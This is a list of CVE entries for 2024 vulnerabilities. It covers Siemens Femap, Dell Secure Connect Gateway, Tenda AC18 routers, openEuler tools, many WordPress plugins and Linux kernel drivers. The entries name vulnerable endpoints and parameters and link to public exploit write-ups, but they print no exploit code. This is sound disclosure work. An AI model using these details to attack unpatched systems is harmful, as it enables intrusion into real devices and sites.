CVE 2024 24922 Candidate A vulnerability has been identified in Simcenter Femap (All versions < V2401.0000). The affected application contains an out of bounds write past the end of an allocated buffer while parsing a specially crafted Catia MODEL file. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-21715) MISC:https://cert-portal.siemens.com/productcert/html/ssa-000072.html | URL:https://cert-portal.siemens.com/productcert/html/ssa-000072.html Assigned (20240201)
CVE 2024 24921 Candidate A vulnerability has been identified in Simcenter Femap (All versions < V2401.0000). The affected application is vulnerable to memory corruption while parsing specially crafted Catia MODEL files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-21712) MISC:https://cert-portal.siemens.com/productcert/html/ssa-000072.html | URL:https://cert-portal.siemens.com/productcert/html/ssa-000072.html Assigned (20240201)
CVE 2024 24920 Candidate A vulnerability has been identified in Simcenter Femap (All versions < V2401.0000). The affected application contains an out of bounds write past the end of an allocated buffer while parsing a specially crafted Catia MODEL file. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-21710) MISC:https://cert-portal.siemens.com/productcert/html/ssa-000072.html | URL:https://cert-portal.siemens.com/productcert/html/ssa-000072.html Assigned (20240201)
CVE 2024 24907 Candidate Dell Secure Connect Gateway (SCG) Policy Manager, all versions, contain(s) a Stored Cross-Site Scripting Vulnerability in the Filters page. An adjacent network high privileged attacker could potentially exploit this vulnerability, leading to the storage of malicious HTML or JavaScript codes in a trusted application data store. When a victim user accesses the data store through their browsers, the malicious code gets executed by the web browser in the context of the vulnerable web application. Exploitation may lead to information disclosure, session theft, or client-side request forgery. MISC:https://www.dell.com/support/kbdoc/en-us/000222330/dsa-2024-077-security-update-for-dell-secure-connect-gateway-policy-manager-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222330/dsa-2024-077-security-update-for-dell-secure-connect-gateway-policy-manager-vulnerabilities Assigned (20240201)
CVE 2024 24906 Candidate Dell Secure Connect Gateway (SCG) Policy Manager, all versions, contain(s) a Stored Cross-Site Scripting Vulnerability in Policy page. An adjacent network high privileged attacker could potentially exploit this vulnerability, leading to the storage of malicious HTML or JavaScript codes in a trusted application data store. When a victim user accesses the data store through their browsers, the malicious code gets executed by the web browser in the context of the vulnerable web application. Exploitation may lead to information disclosure, session theft, or client-side request forgery. MISC:https://www.dell.com/support/kbdoc/en-us/000222330/dsa-2024-077-security-update-for-dell-secure-connect-gateway-policy-manager-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222330/dsa-2024-077-security-update-for-dell-secure-connect-gateway-policy-manager-vulnerabilities Assigned (20240201)
CVE 2024 24905 Candidate Dell Secure Connect Gateway (SCG) Policy Manager, all versions, contain(s) a Stored Cross-Site Scripting Vulnerability. An adjacent network high privileged attacker could potentially exploit this vulnerability, leading to the storage of malicious HTML or JavaScript codes in a trusted application data store. When a victim user accesses the data store through their browsers, the malicious code gets executed by the web browser in the context of the vulnerable web application. Exploitation may lead to information disclosure, session theft, or client-side request forgery. MISC:https://www.dell.com/support/kbdoc/en-us/000222330/dsa-2024-077-security-update-for-dell-secure-connect-gateway-policy-manager-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222330/dsa-2024-077-security-update-for-dell-secure-connect-gateway-policy-manager-vulnerabilities Assigned (20240201)
CVE 2024 24903 Candidate Dell Secure Connect Gateway (SCG) Policy Manager, version 5.10+, contain a weak password recovery mechanism for forgotten passwords. An adjacent network low privileged attacker could potentially exploit this vulnerability, leading to unauthorized access to the application with privileges of the compromised account. The attacker could retrieve the reset password token without authorization and then perform the password change. MISC:https://www.dell.com/support/kbdoc/en-us/000222330/dsa-2024-077-security-update-for-dell-secure-connect-gateway-policy-manager-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222330/dsa-2024-077-security-update-for-dell-secure-connect-gateway-policy-manager-vulnerabilities Assigned (20240201)
CVE 2024 24901 Candidate Dell PowerScale OneFS 8.2.x through 9.6.0.x contain an insufficient logging vulnerability. A local malicious user with high privileges could potentially exploit this vulnerability, causing audit messages lost and not recorded for a specific time period. MISC:https://www.dell.com/support/kbdoc/en-us/000222691/dsa-2024-062-security-update-for-dell-powerscale-onefs-for-proprietary-code-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222691/dsa-2024-062-security-update-for-dell-powerscale-onefs-for-proprietary-code-vulnerabilities Assigned (20240201)
CVE 2024 24900 Candidate Dell Secure Connect Gateway (SCG) Policy Manager, all versions, contain an improper authorization vulnerability. An adjacent network low privileged attacker could potentially exploit this vulnerability, leading to unauthorized devices added to policies. Exploitation may lead to information disclosure and unauthorized access to the system. MISC:https://www.dell.com/support/kbdoc/en-us/000222330/dsa-2024-077-security-update-for-dell-secure-connect-gateway-policy-manager-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222330/dsa-2024-077-security-update-for-dell-secure-connect-gateway-policy-manager-vulnerabilities Assigned (20240201)
CVE 2024 2490 Candidate A vulnerability classified as critical was found in Tenda AC18 15.03.05.05. Affected by this vulnerability is the function setSchedWifi of the file /goform/openSchedWifi. The manipulation of the argument schedStartTime/schedEndTime leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256897 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256897 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.256897 | MISC:VDB-256897 | Tenda AC18 openSchedWifi setSchedWifi stack-based overflow | URL:https://vuldb.com/?id.256897 | MISC:https://github.com/Emilytutu/IoT-vulnerable/blob/main/Tenda/AC18/setSchedWifi_end.md | URL:https://github.com/Emilytutu/IoT-vulnerable/blob/main/Tenda/AC18/setSchedWifi_end.md Assigned (20240315)
CVE 2024 24899 Candidate Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in openEuler aops-zeus on Linux allows Command Injection. This vulnerability is associated with program files https://gitee.Com/openeuler/aops-zeus/blob/master/zeus/conf/constant.Py. This issue affects aops-zeus: from 1.2.0 through 1.4.0. MISC:https://gitee.com/src-openeuler/aops-zeus/pulls/107 | URL:https://gitee.com/src-openeuler/aops-zeus/pulls/107 | MISC:https://gitee.com/src-openeuler/aops-zeus/pulls/108 | URL:https://gitee.com/src-openeuler/aops-zeus/pulls/108 | MISC:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1291 | URL:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1291 | MISC:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1292 | URL:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1292 | MISC:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1293 | URL:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1293 | MISC:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1294 | URL:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1294 Assigned (20240201)
CVE 2024 24897 Candidate Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in openEuler A-Tune-Collector on Linux allows Command Injection. This vulnerability is associated with program files https://gitee.Com/openeuler/A-Tune-Collector/blob/master/atune_collector/plugin/monitor/process/sched.Py. This issue affects A-Tune-Collector: from 1.1.0-3 through 1.3.0. MISC:https://gitee.com/src-openeuler/A-Tune-Collector/pulls/45 | URL:https://gitee.com/src-openeuler/A-Tune-Collector/pulls/45 | MISC:https://gitee.com/src-openeuler/A-Tune-Collector/pulls/47 | URL:https://gitee.com/src-openeuler/A-Tune-Collector/pulls/47 | MISC:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1271 | URL:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1271 | MISC:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1273 | URL:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1273 Assigned (20240201)
CVE 2024 24892 Candidate Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'), Improper Privilege Management vulnerability in openEuler migration-tools on Linux allows Command Injection, Restful Privilege Elevation. This vulnerability is associated with program files https://gitee.Com/openeuler/migration-tools/blob/master/index.Py. This issue affects migration-tools: from 1.0.0 through 1.0.1. MISC:https://gitee.com/src-openeuler/migration-tools/pulls/12 | URL:https://gitee.com/src-openeuler/migration-tools/pulls/12 | MISC:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1275 | URL:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1275 Assigned (20240201)
CVE 2024 24890 Candidate Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in openEuler gala-gopher on Linux allows Command Injection. This vulnerability is associated with program files https://gitee.Com/openeuler/gala-gopher/blob/master/src/probes/extends/ebpf.Probe/src/ioprobe/ioprobe.C. This issue affects gala-gopher: through 1.0.2. MISC:https://gitee.com/src-openeuler/gala-gopher/pulls/81 | URL:https://gitee.com/src-openeuler/gala-gopher/pulls/81 | MISC:https://gitee.com/src-openeuler/gala-gopher/pulls/82 | URL:https://gitee.com/src-openeuler/gala-gopher/pulls/82 | MISC:https://gitee.com/src-openeuler/gala-gopher/pulls/85 | URL:https://gitee.com/src-openeuler/gala-gopher/pulls/85 | MISC:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1277 | URL:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1277 | MISC:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1278 | URL:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1278 | MISC:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1279 | URL:https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1279 Assigned (20240201)
CVE 2024 2489 Candidate A vulnerability classified as critical has been found in Tenda AC18 15.03.05.05. Affected is the function formSetQosBand of the file /goform/SetNetControlList. The manipulation of the argument list leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256896. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256896 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.256896 | MISC:VDB-256896 | Tenda AC18 SetNetControlList formSetQosBand stack-based overflow | URL:https://vuldb.com/?id.256896 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/formSetQosBand.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/formSetQosBand.md Assigned (20240315)
CVE 2024 24889 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Geek Code Lab All 404 Pages Redirect to Homepage allows Stored XSS.This issue affects All 404 Pages Redirect to Homepage: from n/a through 1.9. MISC:https://patchstack.com/database/vulnerability/all-404-pages-redirect-to-homepage/wordpress-all-404-pages-redirect-to-homepage-plugin-1-9-unauthenticated-stored-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/all-404-pages-redirect-to-homepage/wordpress-all-404-pages-redirect-to-homepage-plugin-1-9-unauthenticated-stored-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240201)
CVE 2024 24887 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Contest Gallery Photos and Files Contest Gallery – Contact Form, Upload Form, Social Share and Voting Plugin for WordPress.This issue affects Photos and Files Contest Gallery – Contact Form, Upload Form, Social Share and Voting Plugin for WordPress: from n/a through 21.2.8.4. MISC:https://patchstack.com/database/vulnerability/contest-gallery/wordpress-photos-and-files-contest-gallery-plugin-21-2-8-4-csrf-leading-to-gallery-creation-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/contest-gallery/wordpress-photos-and-files-contest-gallery-plugin-21-2-8-4-csrf-leading-to-gallery-creation-vulnerability?_s_id=cve Assigned (20240201)
CVE 2024 24886 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Acowebs Product Labels For Woocommerce (Sale Badges) allows Stored XSS.This issue affects Product Labels For Woocommerce (Sale Badges): from n/a through 1.5.3. MISC:https://patchstack.com/database/vulnerability/aco-product-labels-for-woocommerce/wordpress-product-labels-for-woocommerce-sale-badges-plugin-1-5-3-authenticated-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/aco-product-labels-for-woocommerce/wordpress-product-labels-for-woocommerce-sale-badges-plugin-1-5-3-authenticated-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240201)
CVE 2024 24885 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Lê Văn Toản Woocommerce Vietnam Checkout allows Stored XSS.This issue affects Woocommerce Vietnam Checkout: from n/a through 2.0.7. MISC:https://patchstack.com/database/vulnerability/woo-vietnam-checkout/wordpress-woocommerce-vietnam-checkout-plugin-2-0-7-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/woo-vietnam-checkout/wordpress-woocommerce-vietnam-checkout-plugin-2-0-7-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240201)
CVE 2024 24884 Candidate Cross-Site Request Forgery (CSRF) vulnerability in ARI Soft Contact Form 7 Connector.This issue affects Contact Form 7 Connector: from n/a through 1.2.2. MISC:https://patchstack.com/database/vulnerability/ari-cf7-connector/wordpress-contact-form-7-connector-plugin-1-2-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/ari-cf7-connector/wordpress-contact-form-7-connector-plugin-1-2-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240201)
CVE 2024 24883 Candidate Missing Authorization vulnerability in BdThemes Prime Slider – Addons For Elementor.This issue affects Prime Slider – Addons For Elementor: from n/a through 3.11.10. MISC:https://patchstack.com/database/vulnerability/bdthemes-prime-slider-lite/wordpress-prime-slider-plugin-3-11-10-broken-access-control-on-duplicate-post-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/bdthemes-prime-slider-lite/wordpress-prime-slider-plugin-3-11-10-broken-access-control-on-duplicate-post-vulnerability?_s_id=cve Assigned (20240201)
CVE 2024 24881 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VeronaLabs WP SMS – Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc allows Reflected XSS.This issue affects WP SMS – Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc: from n/a through 6.5.2. MISC:https://patchstack.com/database/vulnerability/wp-sms/wordpress-wp-sms-plugin-6-5-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wp-sms/wordpress-wp-sms-plugin-6-5-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240201)
CVE 2024 24880 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apollo13Themes Apollo13 Framework Extensions allows Stored XSS.This issue affects Apollo13 Framework Extensions: from n/a through 1.9.2. MISC:https://patchstack.com/database/vulnerability/apollo13-framework-extensions/wordpress-apollo13-framework-extensions-plugin-1-9-2-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/apollo13-framework-extensions/wordpress-apollo13-framework-extensions-plugin-1-9-2-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240201)
CVE 2024 2488 Candidate A vulnerability was found in Tenda AC18 15.03.05.05. It has been rated as critical. This issue affects the function formSetPPTPServer of the file /goform/SetPptpServerCfg. The manipulation of the argument startIP leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256895. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256895 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.256895 | MISC:VDB-256895 | Tenda AC18 SetPptpServerCfg formSetPPTPServer stack-based overflow | URL:https://vuldb.com/?id.256895 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/formSetPPTPServer.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/formSetPPTPServer.md Assigned (20240315)
CVE 2024 24879 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Yannick Lefebvre Link Library allows Reflected XSS.This issue affects Link Library: from n/a through 7.5.13. MISC:https://patchstack.com/database/vulnerability/link-library/wordpress-link-library-plugin-7-5-13-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/link-library/wordpress-link-library-plugin-7-5-13-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240201)
CVE 2024 24878 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PT Woo Plugins (by Webdados) Portugal CTT Tracking for WooCommerce allows Reflected XSS.This issue affects Portugal CTT Tracking for WooCommerce: from n/a through 2.1. MISC:https://patchstack.com/database/vulnerability/portugal-ctt-tracking-woocommerce/wordpress-portugal-ctt-tracking-for-woocommerce-plugin-2-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/portugal-ctt-tracking-woocommerce/wordpress-portugal-ctt-tracking-for-woocommerce-plugin-2-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240201)
CVE 2024 24877 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Magic Hills Pty Ltd Wonder Slider Lite allows Reflected XSS.This issue affects Wonder Slider Lite: from n/a through 13.9. MISC:https://patchstack.com/database/vulnerability/wonderplugin-slider-lite/wordpress-wonder-slider-lite-plugin-13-9-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wonderplugin-slider-lite/wordpress-wonder-slider-lite-plugin-13-9-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240201)
CVE 2024 24876 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Janis Elsts Admin Menu Editor.This issue affects Admin Menu Editor: from n/a through 1.12. MISC:https://patchstack.com/database/vulnerability/admin-menu-editor/wordpress-admin-menu-editor-plugin-1-12-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/admin-menu-editor/wordpress-admin-menu-editor-plugin-1-12-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240201)
CVE 2024 24875 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Yannick Lefebvre Link Library.This issue affects Link Library: from n/a through 7.5.13. MISC:https://patchstack.com/database/vulnerability/link-library/wordpress-link-library-plugin-7-5-13-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/link-library/wordpress-link-library-plugin-7-5-13-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240201)
CVE 2024 24872 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Themify Themify Builder.This issue affects Themify Builder: from n/a through 7.0.5. MISC:https://patchstack.com/database/vulnerability/themify-builder/wordpress-themify-builder-plugin-7-0-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/themify-builder/wordpress-themify-builder-plugin-7-0-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240201)
CVE 2024 24871 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Creative Themes Blocksy allows Stored XSS.This issue affects Blocksy: from n/a through 2.0.19. MISC:https://patchstack.com/database/vulnerability/blocksy/wordpress-blocksy-theme-2-0-19-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/blocksy/wordpress-blocksy-theme-2-0-19-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240201)
CVE 2024 24870 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Michael Dempfle Advanced iFrame allows Stored XSS.This issue affects Advanced iFrame: from n/a through 2023.10. MISC:https://patchstack.com/database/vulnerability/advanced-iframe/wordpress-advanced-iframe-plugin-2023-10-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/advanced-iframe/wordpress-advanced-iframe-plugin-2023-10-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240201)
CVE 2024 2487 Candidate A vulnerability was found in Tenda AC18 15.03.05.05. It has been declared as critical. This vulnerability affects the function formSetDeviceName of the file /goform/SetOnlineDevName. The manipulation of the argument devName/mac leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-256894 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256894 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.256894 | MISC:VDB-256894 | Tenda AC18 SetOnlineDevName formSetDeviceName stack-based overflow | URL:https://vuldb.com/?id.256894 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/formSetDeviceName_devName.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/formSetDeviceName_devName.md Assigned (20240315)
CVE 2024 24868 Candidate Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Smartypants SP Project & Document Manager.This issue affects SP Project & Document Manager: from n/a through 4.69. MISC:https://patchstack.com/database/vulnerability/sp-client-document-manager/wordpress-sp-project-document-manager-plugin-4-69-contributor-sql-injection-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/sp-client-document-manager/wordpress-sp-project-document-manager-plugin-4-69-contributor-sql-injection-vulnerability?_s_id=cve Assigned (20240201)
CVE 2024 24867 Candidate Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Osamaesh WP Visitor Statistics (Real Time Traffic).This issue affects WP Visitor Statistics (Real Time Traffic): from n/a through 6.9.4. MISC:https://patchstack.com/database/vulnerability/wp-stats-manager/wordpress-wp-stats-manager-plugin-6-9-4-sensitive-data-exposure-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wp-stats-manager/wordpress-wp-stats-manager-plugin-6-9-4-sensitive-data-exposure-vulnerability?_s_id=cve Assigned (20240201)
CVE 2024 24866 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Biteship Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo allows Reflected XSS.This issue affects Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo: from n/a through 2.2.24. MISC:https://patchstack.com/database/vulnerability/biteship/wordpress-biteship-plugin-2-2-24-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/biteship/wordpress-biteship-plugin-2-2-24-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240201)
CVE 2024 24865 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Noah Kagan Scroll Triggered Box allows Stored XSS.This issue affects Scroll Triggered Box: from n/a through 2.3. MISC:https://patchstack.com/database/vulnerability/dreamgrow-scroll-triggered-box/wordpress-scroll-triggered-box-plugin-2-3-cross-site-scripting-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/dreamgrow-scroll-triggered-box/wordpress-scroll-triggered-box-plugin-2-3-cross-site-scripting-vulnerability?_s_id=cve Assigned (20240201)
CVE 2024 24864 Candidate A race condition was found in the Linux kernel's media/dvb-core in dvbdmx_write() function. This can result in a null pointer dereference issue, possibly leading to a kernel panic or denial of service issue. MISC:https://bugzilla.openanolis.cn/show_bug.cgi?id=8178 | URL:https://bugzilla.openanolis.cn/show_bug.cgi?id=8178 Assigned (20240201)
CVE 2024 24861 Candidate A race condition was found in the Linux kernel's media/xc4000 device driver in xc4000 xc4000_get_frequency() function. This can result in return value overflow issue, possibly leading to malfunction or denial of service issue. MISC:https://bugzilla.openanolis.cn/show_bug.cgi?id=8150 | URL:https://bugzilla.openanolis.cn/show_bug.cgi?id=8150 Assigned (20240201)
CVE 2024 24860 Candidate A race condition was found in the Linux kernel's bluetooth device driver in {min,max}_key_size_set() function. This can result in a null pointer dereference issue, possibly leading to a kernel panic or denial of service issue. MISC:https://bugzilla.openanolis.cn/show_bug.cgi?id=8151 | URL:https://bugzilla.openanolis.cn/show_bug.cgi?id=8151 Assigned (20240201)
CVE 2024 2486 Candidate A vulnerability was found in Tenda AC18 15.03.05.05. It has been classified as critical. This affects the function formQuickIndex of the file /goform/QuickIndex. The manipulation of the argument PPPOEPassword leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256893 was assigned to this vulnerability. MISC:VDB-256893 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.256893 | MISC:VDB-256893 | Tenda AC18 QuickIndex formQuickIndex stack-based overflow | URL:https://vuldb.com/?id.256893 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/formQuickIndex.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/formQuickIndex.md Assigned (20240315)
CVE 2024 24859 Candidate A race condition was found in the Linux kernel's net/bluetooth in sniff_{min,max}_interval_set() function. This can result in a bluetooth sniffing exception issue, possibly leading denial of service. MISC:https://bugzilla.openanolis.cn/show_bug.cgi?id=8153 | URL:https://bugzilla.openanolis.cn/show_bug.cgi?id=8153 Assigned (20240201)
CVE 2024 24858 Candidate A race condition was found in the Linux kernel's net/bluetooth in {conn,adv}_{min,max}_interval_set() function. This can result in I2cap connection or broadcast abnormality issue, possibly leading to denial of service. MISC:https://bugzilla.openanolis.cn/show_bug.cgi?id=8154 | URL:https://bugzilla.openanolis.cn/show_bug.cgi?id=8154 Assigned (20240201)
CVE 2024 24857 Candidate A race condition was found in the Linux kernel's net/bluetooth device driver in conn_info_{min,max}_age_set() function. This can result in integrity overflow issue, possibly leading to bluetooth connection abnormality or denial of service. MISC:https://bugzilla.openanolis.cn/show_bug.cgi?id=8155 | URL:https://bugzilla.openanolis.cn/show_bug.cgi?id=8155 Assigned (20240201)
CVE 2024 24855 Candidate A race condition was found in the Linux kernel's scsi device driver in lpfc_unregister_fcf_rescan() function. This can result in a null pointer dereference issue, possibly leading to a kernel panic or denial of service issue. MISC:https://bugzilla.openanolis.cn/show_bug.cgi?id=8149 | URL:https://bugzilla.openanolis.cn/show_bug.cgi?id=8149 Assigned (20240201)
CVE 2024 24850 Candidate Missing Authorization vulnerability in Mark Stockton Quicksand Post Filter jQuery Plugin.This issue affects Quicksand Post Filter jQuery Plugin: from n/a through 3.1.1. MISC:https://patchstack.com/database/vulnerability/quicksand-jquery-post-filter/wordpress-quicksand-post-filter-jquery-plugin-3-1-1-broken-access-control-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/quicksand-jquery-post-filter/wordpress-quicksand-post-filter-jquery-plugin-3-1-1-broken-access-control-vulnerability?_s_id=cve Assigned (20240131)
CVE 2024 2485 Candidate A vulnerability was found in Tenda AC18 15.03.05.05 and classified as critical. Affected by this issue is the function formSetSpeedWan of the file /goform/SetSpeedWan. The manipulation of the argument speed_dir leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256892. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256892 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.256892 | MISC:VDB-256892 | Tenda AC18 SetSpeedWan formSetSpeedWan stack-based overflow | URL:https://vuldb.com/?id.256892 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/SetSpeedWan.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/SetSpeedWan.md Assigned (20240315)
CVE 2024 24849 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Mark Stockton Quicksand Post Filter jQuery Plugin.This issue affects Quicksand Post Filter jQuery Plugin: from n/a through 3.1.1. MISC:https://patchstack.com/database/vulnerability/quicksand-jquery-post-filter/wordpress-quicksand-post-filter-jquery-plugin-3-1-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/quicksand-jquery-post-filter/wordpress-quicksand-post-filter-jquery-plugin-3-1-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240131)
CVE 2024 24848 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MJS Software PT Sign Ups – Beautiful volunteer sign ups and management made easy allows Stored XSS.This issue affects PT Sign Ups – Beautiful volunteer sign ups and management made easy: from n/a through 1.0.4. MISC:https://patchstack.com/database/vulnerability/ptoffice-sign-ups/wordpress-pt-sign-ups-plugin-1-0-4-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/ptoffice-sign-ups/wordpress-pt-sign-ups-plugin-1-0-4-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240131)
